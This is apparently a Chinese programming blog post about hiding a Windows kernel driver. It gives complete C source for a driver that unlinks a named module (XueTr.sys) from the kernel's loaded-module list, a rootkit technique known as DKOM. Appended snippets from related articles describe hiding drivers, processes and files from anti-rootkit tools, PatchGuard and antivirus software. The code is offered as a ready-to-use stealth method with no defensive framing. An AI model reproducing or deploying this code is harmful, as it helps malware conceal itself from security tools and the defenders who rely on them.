隐藏驱动模块

最新推荐文章于 2023-04-22 19:23:01 发布
最新推荐文章于 2023-04-22 19:23:01 发布
阅读量2k 收藏 3
点赞数
分类专栏: 驱动编程 
#include <ntddk.h>

typedef unsigned long DWORD;

typedef struct _KLDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;
    PVOID ExceptionTable;
    ULONG ExceptionTableSize;
    PVOID GpValue;
    DWORD UnKnow;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    ULONG Flags;
    USHORT LoadCount;
    USHORT __Unused5;
    PVOID SectionPointer;
    ULONG CheckSum;
    PVOID LoadedImports;
    PVOID PatchInformation;
} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;

PDRIVER_OBJECT pDriverObject = NULL;

VOID 
HideDriver()
{
    PKLDR_DATA_TABLE_ENTRY entry =(PKLDR_DATA_TABLE_ENTRY)pDriverObject->DriverSection;
    PKLDR_DATA_TABLE_ENTRY firstentry;
    UNICODE_STRING uniDriverName;
    
    firstentry = entry;

    // 初始化要隐藏驱动的驱动名
    RtlInitUnicodeString(&uniDriverName, L"XueTr.sys");
    
    while((PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink != firstentry)
    {
        if (entry->FullDllName.Buffer != 0)
        {    
            if (RtlCompareUnicodeString(&uniDriverName, &(entry->BaseDllName), FALSE) == 0)
            {
                KdPrint(("隐藏驱动 %ws 成功!\n", entry->BaseDllName.Buffer));    
                // 修改 Flink 和 Blink 指针, 以跳过我们要隐藏的驱动
                *((DWORD*)entry->InLoadOrderLinks.Blink) = (DWORD)entry->InLoadOrderLinks.Flink;
                entry->InLoadOrderLinks.Flink->Blink = entry->InLoadOrderLinks.Blink;
                
                /* 
                    使被隐藏驱动LIST_ENTRY结构体的Flink, Blink域指向自己
                    因为此节点本来在链表中, 那么它邻接的节点驱动被卸载时, 
                    系统会把此节点的Flink, Blink域指向它相邻节点的下一个节点.
                    但是, 它此时已经脱离链表了, 如果现在它原本相邻的节点驱动被
                    卸载了, 那么此节点的Flink, Blink域将有可能指向无用的地址, 而
                    造成随机性的BSoD.
                */
                entry->InLoadOrderLinks.Flink = (LIST_ENTRY*)&(entry->InLoadOrderLinks.Flink);
                entry->InLoadOrderLinks.Blink = (LIST_ENTRY*)&(entry->InLoadOrderLinks.Flink);

                break;
            }
        }
        // 链表往前走
        entry = (PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;
    }
}

NTSTATUS 
UnloadDriver(
             IN PDRIVER_OBJECT DriverObject
             )
{
    return STATUS_SUCCESS;
}

NTSTATUS 
DriverEntry(
            IN PDRIVER_OBJECT DriverObject, 
            IN PUNICODE_STRING  RegistryPath
            )
{
    DriverObject->DriverUnload = UnloadDriver;
    pDriverObject = DriverObject;
    HideDriver();
    return STATUS_SUCCESS;
}

125096
关注
专栏目录
驱动模块隐藏源码.rar
09-25
纯源码,驱动源码,不是sys成品文件,而是sys驱动文件源代码,非常适合参考学习 是x64的,隐藏指定驱动sys,不被检测
驱动隐藏文件
06-08
驱动隐藏文件,源文件只有一个,其他为编译所需要的辅助文件,miniHide.c,makefile,minihide.dsp,source等
驱动隐藏模块
最新发布
qq_45844442的博客
04-22 524
以下代码为驱动隐藏代码,代码比较简单,只需要修改一下PsCreateSystemThread函数最后一个成员,改为自己的驱动名称就可以了(注意不加后缀),这份代码与很多网上的相似,但是当我用网上的代码运行时各种蓝屏,不是少写了个取地址就是IoDriverObjectType没有声明为指针的指针,于是修复了他们写的bug。
R0隐藏驱动模块代码
编程论坛
08-20 2447
BOOLEAN ValidateUnicodeString(PUNICODE_STRING usStr) { ULONG i; __try { if (!MmIsAddressValid(usStr)) { return FALSE; } if (usStr->Buffer...
隐藏驱动模块(源码)
liujiayu2的专栏
06-16 2933
XP亲测有效,使用我们自己编写的枚举驱动模块会看不到。枚举驱动模块请看文章 http://blog.csdn.net/liujiayu2/article/details/72822478 但是使用ARK工具依然能看到我们隐藏驱动某块,比如kernel detective 和PChunter 但是隐藏驱动模块为红色,意为ARK工具检测到了该模块进行了隐藏 #include
VipShell驱动隐藏模块
03-22 1266
目前支持 隐藏端口, 进程, 文件#include #include #include "./RootKitModule.h"#include ADD_PINBOARD(RootKitModule)BEGIN_DLLCreatePINBOARDINSTANCEADD_DLL_PINBOARD_SUSTAIN(RootKitModule)END_DLLCreatePINBOARDINSTANCE#d
HideDriver-master_HideDriver_HideDriver-master_驱动隐藏断链_隐藏驱动模块例子_源
09-11
因此,"HideDriver-master" 提供的隐藏驱动模块例子旨在绕过PG的检测,这对于合法但需要保持隐蔽性的驱动开发尤其有用。 在"HideDriver-master" 压缩包中,可能包含有源代码、编译脚本、说明文档等资源,用户可以...
HideDriver-master_HideDriver_HideDriver-master_驱动隐藏断链_隐藏驱动模块例子.z
10-10
标题中的"HideDriver-master_HideDriver_HideDriver-master_驱动隐藏断链_隐藏驱动模块例子"揭示了这个压缩包文件的主要内容,它涉及到一个关于驱动隐藏和断链的技术实例。在IT领域,尤其是系统安全和恶意软件分析中...
HideDriver_hidedriver_TP_驱动隐藏_驱动断链隐藏_隐藏驱动
09-11
"HideDriver_hidedriver_TP_驱动隐藏_驱动断链隐藏_隐藏驱动"这个主题涉及到的是驱动程序的安全性和隐藏技术,特别是在对抗动态调试工具如TP(Taint Parser)时的策略。 驱动隐藏是一种技术,用于防止恶意用户或...
驱动隐藏
10-16 1454
 使用可怕的reloadandrun技术后,驱动基本上已经没有DriverObject这种可以枚举的东西,但是还有PEHeader和MZHeader,DosHeader 这三个东西,其实只要在reload后的DriverEntry中抹掉,添0或者添随机数是你的问题啦啦,另外还有一个特征点就是驱动内部的.pdb字符,这个也是可以XX掉的,此时内存中你已经没有任何特征可言了~~吼吼~~最后
win7-32、驱动模块遍历、驱动模块隐藏
Windows内核学习笔记
07-08 909
打印日志前缀,过滤掉不是我们的日志,只会显示我们自己的日志
隐藏驱动程序
02-08
这是一款全自动的网络磁盘代理工具,可以在2秒内为用户创建一个独立的隐藏磁盘,且磁盘容量同步D盘,简单的操作就可以解决用户磁盘空间不足的问题,或者私密文件放置问题,就连腾讯电脑管家和360都查不到该磁盘!
驱动隐藏工具
03-23
驱动隐藏工具,杀毒软件都可以欺骗过去,隐藏任何一个东西都可以
驱动隐藏进程
10-17
驱动级,对进程隐藏,需要的朋友,可以下载使用。
hidedrive驱动隐藏文件/进程
11-30
文件隐藏驱动 在2000\XP\2003等机器上可以运行 比较稳定-documents hidden drive in 2000 \ XP \ 2,003 such machines can run relatively stable
windows10驱动 x64--- 驱动实现隐藏驱动模块(五)
weixin_41725706的博客
11-11 775
隐藏任意内核驱动
驱动简单隐藏
qq_41490873的博客
08-26 1229
此方法可以过一般的ark工具,缺点是不能卸载,如果要卸载的话,需要自己把修改的数据保存号,在卸载的时候恢复。 typedef VOID (*MIPROCESSLOADERENTRY)( IN PVOID DataTableEntry, IN LOGICAL Insert ); //需要使用特征码搜索找出这个函数的地址 MIPROCESSLOADERENTRY MiProcessLoadEntry; VOID ThreadProc(PVOID Context) { PDRIVER_OBJECT Drive
驱动编程,隐藏驱动文件,隐藏驱动
追逐光芒,追随内心
10-28 596
//功能:隐藏驱动名 VOID HideDriver(char* drivername, PDRIVER_OBJECT driverobj) { KIRQL irql; ULONG64 base; PLDR_DATA_TABLE_ENTRY firstentry; PLDR_DATA_TABLE_ENTRY entry = (PLDR_DATA_TABLE_ENTRY)driverobj->DriverSection; firstentry = entry; base = GetDir.
驱动开发:断链隐藏驱动程序自身
热门推荐
CSDN
10-14 1万+
与断链隐藏进程功能类似,关于断链进程隐藏可参考`《驱动开发:DKOM 实现进程隐藏》`这一篇文章,断链隐藏驱动自身则用于隐藏自身SYS驱动文件,当驱动加载后那么使用ARK工具扫描将看不到自身驱动模块,此方法可能会触发PG会蓝屏,在某些驱动辅助中也会使用这种方法隐藏自己。
Linux字符设备驱动实战与模块化设计
作为“黑盒子”,驱动程序隐藏了硬件工作细节,通过标准化的系统调用来实现设备与用户间的通信,确保模块化和灵活性。虽然编写驱动程序可能面临额外的技术挑战,如掌握特定的函数库和内核编程规范,但这种特性使得...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值